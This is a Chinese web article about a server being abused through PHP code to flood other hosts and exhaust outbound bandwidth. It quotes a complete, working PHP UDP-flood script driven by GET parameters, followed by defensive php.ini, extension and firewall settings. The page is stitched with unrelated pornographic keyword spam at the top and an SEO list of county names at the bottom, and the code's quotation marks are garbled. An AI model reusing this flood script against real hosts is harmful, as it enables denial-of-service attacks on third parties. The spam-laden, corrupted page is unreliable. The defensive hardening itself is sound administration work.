色尼玛亚洲综合影院,亚洲3atv精品一区二区三区,麻豆freexxxx性91精品,欧美在线91

防止用戶利用PHP代碼DOS造成用光網(wǎng)絡(luò)帶寬

php代碼調(diào)用sockets,直接用服務(wù)器網(wǎng)絡(luò)攻擊別的IP,常見代碼如下:
復(fù)制代碼 代碼如下:
$packets = 0;
$ip = $_GET[/'ip/'];
$rand = $_GET[/'port/'];
set_time_limit(0);
ignore_user_abort(FALSE);
$exec_time = $_GET[/'time/'];
$time = time();
print /"Flooded: $ip on port $rand
/";
$max_time = $time+$exec_time;
for($i=0;$i<65535;$i++){
$out .= /"X/";
}
while(1){
$packets++;
if(time() > $max_time){
break;
}
$fp = fsockopen(/"udp://$ip/", $rand, $errno, $errstr, 5);
if($fp){
fwrite($fp, $out);
fclose($fp);
}
}
echo /"Packet complete at /".time(/'h:i:s/')./" with $packets (/" . round(($packets*65)/1024, 2) . /" mB) packets averaging /". round($packets/$exec_time, 2) . /" packets/s //n/";
?>

表現(xiàn)特征:
一打開IIS,服務(wù)器的流出帶寬就用光-----就是說服務(wù)器不斷向別人發(fā)包,這個(gè)情況和受到DDOS攻擊是不同的,DDOS是不斷收到大量數(shù)據(jù)包.
解決辦法:
禁止上述的代碼:
在c:/windows/php.ini里設(shè)置:
disable_functions =gzinflate;
在c:/windows/php.ini里設(shè)其值為Off
allow_url_fopen = Off
并且:
;extension=php_sockets.dll
前面的;號(hào)一定要有,意思就是限制用sockets.dll
前面的;號(hào)要保留
然后重啟IIS
如果上述方式仍然無效,你可以在IIS中,允許的擴(kuò)展中,禁止php的擴(kuò)展測(cè)試.
另外,對(duì)于沒加密的php攻擊代碼,還可以用以下辦法處理:
1.在IP策略,或防火墻中,禁止所有udp向外發(fā)送
2.用一流信息監(jiān)控,在SQL攔截及網(wǎng)址攔截中,攔截port=這個(gè)關(guān)鍵詞

php技術(shù)防止用戶利用PHP代碼DOS造成用光網(wǎng)絡(luò)帶寬,轉(zhuǎn)載需保留來源!

鄭重聲明:本文版權(quán)歸原作者所有,轉(zhuǎn)載文章僅為傳播更多信息之目的,如作者信息標(biāo)記有誤,請(qǐng)第一時(shí)間聯(lián)系我們修改或刪除,多謝。

主站蜘蛛池模板: 丹棱县| 枝江市| 儋州市| 镇平县| 理塘县| 贵溪市| 南漳县| 马尔康县| 新郑市| 朝阳区| 新巴尔虎左旗| 武威市| 蛟河市| 清水河县| 华蓥市| 通化市| 聂拉木县| 柞水县| 太康县| 包头市| 偏关县| 威海市| 蓝田县| 贡觉县| 佳木斯市| 始兴县| 团风县| 金湖县| 柘荣县| 石渠县| 民乐县| 寿光市| 原平市| 德庆县| 遵化市| 定陶县| 双峰县| 页游| 孝昌县| 揭西县| 镇坪县|